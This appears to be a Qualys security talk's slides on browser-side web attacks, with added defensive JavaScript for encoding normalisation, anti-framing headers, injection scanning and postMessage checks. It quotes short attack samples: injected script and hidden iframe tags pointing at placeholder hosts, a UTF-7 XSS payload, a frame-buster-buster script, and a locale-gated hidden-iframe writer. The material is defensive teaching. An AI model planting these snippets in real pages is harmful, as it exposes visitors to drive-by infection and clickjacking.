When HTML Goes Bad
Mike Shema
Security Research Engineer, Qualys Inc.
Money
Attacks refocus from the web server to the web browser via the web application
Compromise the web application in order to use it as a delivery mechanism
Infect rather than deface
Automated SQL injection attacks infected tens of thousands of web sites
Us and Them
...exploit the system to gain admin access
Requires shell code
Install keylogger, network sniffer, botnet
Search for documents, credentials,
Poles Apart
Desktop
  Access controls
  Process separation
  Anti-virus

Browser
  Same Origin Policy
  Blocks pop-ups
  Blocks third-party cookies
  Tabs!
  Database (HTML5)
Safe Links?
http://bit.ly/2z3MBj http://bit.ly/z18Rv http://bit.ly/OApJX http://bit.ly/lSxst http://bit.ly/wszWO http://bit.ly/A6Ca http://tinyurl.com/6q2ab9
Infection
<script src=http://_.cn></script>

<iframe src="http://_.info/count.php?o=2" width=0 height=0 style="hidden"
        frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
+ADw-script+AD4/lorem ipsem/.source
XSS
Character encoding
  Valid, but unexpected
  Invalid, but rendered
Payload encoding
  JavaScript obfuscation
  Browser-specific quirk
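The two encoding tricks on the XSS slides (UTF-7 "+ADw-" runs, as in the "+ADw-script+AD4-" sample earlier, and numeric character references that browsers still render) both defeat a filter that inspects raw bytes. The block below is an added example, not code from the talk: it normalises attacker-controlled text with a small UTF-7 decoder and a numeric-entity decoder, repeated until the text stops changing so layered encodings unwind, and then applies the same script-tag check before and after. The sample strings at the bottom are constructed.

```javascript
// Added example, not code from the talk: normalise attacker-controlled text
// before looking for markup, so that encoding tricks (UTF-7 "+ADw-" runs,
// numeric HTML entities, double encoding) cannot hide a <script> tag from a
// filter or a log scanner. The sample inputs at the bottom are constructed.

// Decode UTF-7 shifted runs "+<base64>-" into text. The base64 payload is a
// sequence of UTF-16BE code units; "+-" is a literal plus sign.
function decodeUtf7(text) {
  return text.replace(/\+([A-Za-z0-9+/]*)-?/g, (whole, b64) => {
    if (b64.length === 0) return '+';
    const padded = b64 + '='.repeat((4 - (b64.length % 4)) % 4);
    let bytes = Buffer.from(padded, 'base64');
    // A well-formed run decodes to whole 16-bit units; drop any dangling byte.
    if (bytes.length % 2 === 1) bytes = bytes.subarray(0, bytes.length - 1);
    return Buffer.from(bytes).swap16().toString('utf16le');
  });
}

// Decode numeric character references such as &#60; and &#x3C; (the ";" is
// optional because browsers accept it missing). Named entities are left alone.
function decodeNumericEntities(text) {
  return text.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (whole, ref) => {
    const cp = ref[0].toLowerCase() === 'x' ? parseInt(ref.slice(1), 16) : parseInt(ref, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : whole;
  });
}

// Apply both decoders until nothing changes, so layered encodings unwind.
// Intended for detection, not for display: it is deliberately lossy.
function normalise(text) {
  let current = text;
  for (let round = 0; round < 8; round++) {
    const next = decodeNumericEntities(decodeUtf7(current));
    if (next === current) break;
    current = next;
  }
  return current;
}

const SCRIPT_TAG = /<\s*script\b/i;

// A filter that only inspects the raw bytes.
function naiveCheck(text) {
  return SCRIPT_TAG.test(text);
}

// The same filter applied after normalisation.
function normalisedCheck(text) {
  return SCRIPT_TAG.test(normalise(text));
}

// Constructed samples: UTF-7, numeric entities, entity-encoded UTF-7 (double
// encoding), and a harmless string that happens to contain "+-".
const SAMPLES = [
  '+ADw-script+AD4-alert(1)+ADw-/script+AD4-',
  '&#x3c;script&#x3E;alert(1)&#60;/script&#62;',
  '&#x2b;ADw-script&#x2b;AD4-alert(1)',
  'price went up +-5%, nothing to see',
];

for (const s of SAMPLES) {
  console.log(JSON.stringify(s), 'naive:', naiveCheck(s), 'normalised:', normalisedCheck(s));
}
```

The point of the fixpoint loop is the third sample: one round of entity decoding yields a UTF-7 run, which only the next round turns into a tag. A single-pass decoder reports it as clean.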
Unusual Suspects
Flash
PDF
Images
Browser quirks
CSRF
Taking advantage of the design of HTML & HTTP
Forcing state onto a non-stateful transport
Forced workflows
Frame Busting
Frame buster:

    if (top != self) {
        top.location.replace(self.location.href);
    }

Frame-buster buster (keeps the page framed: every attempt by the framed page to navigate the top window is answered by a server that returns 204, so the navigation never happens):

    <script type="text/javascript">
        var prevent_bust = 0;
        window.onbeforeunload = function() { prevent_bust++; };
        setInterval(function() {
            if (prevent_bust > 0) {
                prevent_bust -= 2;
                window.top.location = 'http://server-which-responds-with204.com';
            }
        }, 1);
    </script>

http://www.codinghorror.com/blog/archives/001277.html
http://stackoverflow.com/questions/958997/frame-buster-busterbuster-code-needed
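The buster-buster above wins because the naive buster relies on navigation, and navigation can be cancelled. A defence that does not navigate has nothing to cancel. The block below is an added example, not code from the talk or from the two linked posts: the server declares who may frame the page, and the page keeps its body hidden until it confirms it is top-level. partner.example in the usage line is a hypothetical allowed ancestor.

```javascript
// Added example, not code from the talk or the two linked posts: a framing
// defence that does not depend on winning the navigation race a frame-buster
// buster exploits. Server side, the response says who may frame the page;
// client side, the body stays hidden unless the page confirms it is top-level.
// partner.example in the usage below is a hypothetical allowed ancestor.

// Build the response headers. frame-ancestors is the control modern browsers
// honour; X-Frame-Options is kept for older ones but can only express DENY or
// SAMEORIGIN, so it is omitted when the allow-list cannot be mapped onto it.
function antiFramingHeaders(allowedAncestors = []) {
  if (allowedAncestors.length === 0) {
    return {
      'Content-Security-Policy': "frame-ancestors 'none'",
      'X-Frame-Options': 'DENY',
    };
  }
  const headers = {
    'Content-Security-Policy': `frame-ancestors ${allowedAncestors.join(' ')}`,
  };
  if (allowedAncestors.length === 1 && allowedAncestors[0] === "'self'") {
    headers['X-Frame-Options'] = 'SAMEORIGIN';
  }
  return headers;
}

// Decide, from a window object, whether the document may be shown. Comparing
// window references is permitted across origins, but the check is wrapped so
// that any exception is treated as "framed". Takes the window as a parameter
// so it can run without a DOM.
function shouldRevealDocument(win) {
  try {
    return win.top === win.self;
  } catch (err) {
    return false;
  }
}

// Markup to place in <head>: the body is hidden by default and only revealed
// when the page is top-level. There is no navigation for a buster-buster to
// cancel, so the page simply stays blank when framed.
function antiClickjackMarkup() {
  return [
    '<style id="antiClickjack">body { display: none !important; }</style>',
    '<script>',
    '  (function () {',
    '    var framed = true;',
    '    try { framed = (self !== top); } catch (e) {}',
    '    if (!framed) {',
    '      var s = document.getElementById("antiClickjack");',
    '      s.parentNode.removeChild(s);',
    '    }',
    '  })();',
    '</script>',
  ].join('\n');
}

// Usage: headers for a page that only its own origin and one partner may frame.
console.log(antiFramingHeaders(["'self'", 'https://partner.example']));
console.log(antiClickjackMarkup());
```

The headers are the real control; the hide-by-default markup only covers browsers that ignore them, and it fails closed (a blank page) rather than open.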
Malware
Drive-by download
Safe browsing lists
Blacklisted domains
Anti-detection mechanisms
if (navigator.systemLanguage == 'zh-cn') {
} else {
    document.writeln("<iframe src=http://_.com/img/info.htm width=0 height=0></iframe>");
}
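The injected markup on the "Infection" slide and the locale-gated writer above share a few telltales: iframes sized or styled to be invisible, script sources pointing off-site, and inline code that consults the visitor's language before writing a frame. The block below is an added example, not code from the talk, of a scanner that flags all three over a page's HTML. SAMPLE_HTML and every host name in it are constructed.

```javascript
// Added example, not code from the talk: a scanner for the injection patterns
// on the "Infection" and "Malware" slides. It flags iframes sized or styled to
// be invisible, script sources outside an allow-list of hosts, and inline
// scripts that decide whether to write an iframe based on the visitor's
// locale. SAMPLE_HTML and every host name in it are constructed.

const TAG_RE = /<(iframe|script)\b([^>]*)>/gi;
const INLINE_SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
const ATTR_RE = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;

// Turn the inside of a start tag into a lower-cased attribute map; handles
// double-quoted, single-quoted and bare values.
function parseAttributes(tagBody) {
  const attrs = {};
  for (const m of tagBody.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Zero dimensions or a style meant to hide the frame. style="hidden" is not
// valid CSS, but it shows up in injected markup, so it is matched literally.
function looksHidden(attrs) {
  const style = (attrs.style || '').replace(/\s+/g, '').toLowerCase();
  return attrs.width === '0' || attrs.height === '0' ||
    style.includes('display:none') || style.includes('hidden');
}

// Resolve a src against the page's own URL and return its host, or null when
// there is no src or it does not parse.
function hostOf(src, pageUrl) {
  if (!src) return null;
  try {
    return new URL(src, pageUrl).host;
  } catch (err) {
    return null;
  }
}

function findSuspiciousTags(html, pageUrl, trustedHosts) {
  const findings = [];
  for (const m of html.matchAll(TAG_RE)) {
    const tag = m[1].toLowerCase();
    const attrs = parseAttributes(m[2]);
    const host = hostOf(attrs.src, pageUrl);
    if (tag === 'iframe' && looksHidden(attrs)) {
      findings.push({ tag, reason: 'hidden iframe', src: attrs.src || '' });
    }
    if (tag === 'script' && host && !trustedHosts.includes(host)) {
      findings.push({ tag, reason: 'third-party script', src: attrs.src });
    }
  }
  for (const m of html.matchAll(INLINE_SCRIPT_RE)) {
    const body = m[1];
    if (/navigator\.(systemLanguage|userLanguage|language)/.test(body) &&
        /document\.write(ln)?\s*\(/.test(body)) {
      findings.push({ tag: 'script', reason: 'locale-gated document.write', src: '' });
    }
  }
  return findings;
}

// Constructed page: one trusted script, one off-site script, one locale-gated
// writer, one hidden tracking iframe and one legitimate video embed.
const SAMPLE_HTML = `<html><head>
<script src="/js/app.js"></script>
<script src=http://stats.example/t.js></script>
<script>
if (navigator.systemLanguage == 'zh-cn') {
} else {
    document.writeln("<iframe src=http://tracker.example/i.htm width=0 height=0></iframe>");
}
</script>
</head><body>
<p>Welcome</p>
<iframe src="http://tracker.example/count.php?o=2" width=0 height=0 style="hidden" frameborder=0></iframe>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
</body></html>`;

for (const f of findSuspiciousTags(SAMPLE_HTML, 'https://page.example/', ['page.example'])) {
  console.log(f.reason, f.src);
}
```

The iframe inside the document.writeln string is reported twice over: once as a hidden iframe (the regex sees it in the source) and once through the locale-gated writer. That is deliberate; each finding is a separate reason to look at the page.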
Browser Evolution
Move more countermeasures into the browser
Process isolation
Anti-XSS
Anti-CSRF
Behavioral anti-virus
A New Machine
HTML5
Cross-document messaging, a.k.a. Some Other Origins, Too
Database
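Cross-document messaging is the deliberate hole in the Same Origin Policy: a page can receive data from any origin, so the receiver has to decide for itself who it trusts. The block below is an added example, not code from the talk, of a receiver that gates on event.origin and dispatches through a fixed table, together with a sender that always names its target origin. The handler takes an event-shaped object so it runs outside a browser; in a page it would be registered with window.addEventListener('message', ...). The origins and message types are hypothetical.

```javascript
// Added example, not code from the talk: a receiver for HTML5 cross-document
// messaging that treats the sender's origin and the message body as untrusted
// input, plus the matching sender that always names its target origin. The
// handler takes an event-shaped object so it can run outside a browser; in a
// page it is registered with window.addEventListener('message', ...). The
// origins and message types are hypothetical.

const TRUSTED_ORIGINS = new Set(['https://app.example', 'https://widget.example']);

// Allowed message types map to handlers; anything else is dropped. Dispatching
// through a table avoids ever evaluating message content as code.
const ACTIONS = {
  setTheme: (payload) => (payload === 'dark' || payload === 'light' ? payload : 'light'),
  echo: (payload) => String(payload).slice(0, 100),
};

function handleMessage(event) {
  // event.origin is set by the browser and cannot be forged by the sender, so
  // it is the one field that can be trusted to gate everything else.
  if (!TRUSTED_ORIGINS.has(event.origin)) {
    return { accepted: false, reason: 'untrusted origin: ' + event.origin };
  }
  let msg = null;
  try {
    msg = typeof event.data === 'string' ? JSON.parse(event.data) : null;
  } catch (err) {
    msg = null;
  }
  if (!msg || typeof msg.type !== 'string') {
    return { accepted: false, reason: 'malformed message' };
  }
  // Own-property lookup so "toString" or "__proto__" cannot reach a handler.
  const action = Object.prototype.hasOwnProperty.call(ACTIONS, msg.type) ? ACTIONS[msg.type] : null;
  if (!action) return { accepted: false, reason: 'unknown type: ' + msg.type };
  return { accepted: true, result: action(msg.payload) };
}

// Sender side: refuse to broadcast with '*', which would deliver the message to
// whatever document currently occupies the target window.
function postTo(targetWindow, targetOrigin, type, payload) {
  if (targetOrigin === '*') {
    throw new Error('refusing to post to any origin; name the recipient');
  }
  targetWindow.postMessage(JSON.stringify({ type, payload }), targetOrigin);
}

// Usage with constructed events standing in for what the browser delivers.
console.log(handleMessage({ origin: 'https://app.example', data: JSON.stringify({ type: 'setTheme', payload: 'dark' }) }));
console.log(handleMessage({ origin: 'https://attacker.example', data: JSON.stringify({ type: 'setTheme', payload: 'dark' }) }));
console.log(handleMessage({ origin: 'https://app.example', data: 'alert(1)' }));
```

The same discipline applies to the HTML5 client-side database: it is scoped per origin, so data written into it is only as trustworthy as the code that was allowed to run in that origin.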
Thank You!
During Live Presentation Please Use Your WebEx Q&A Panel to Submit Questions
To Request a 14-day Free Trial of our Web Application Scanning Solution, email: was-info@qualys.com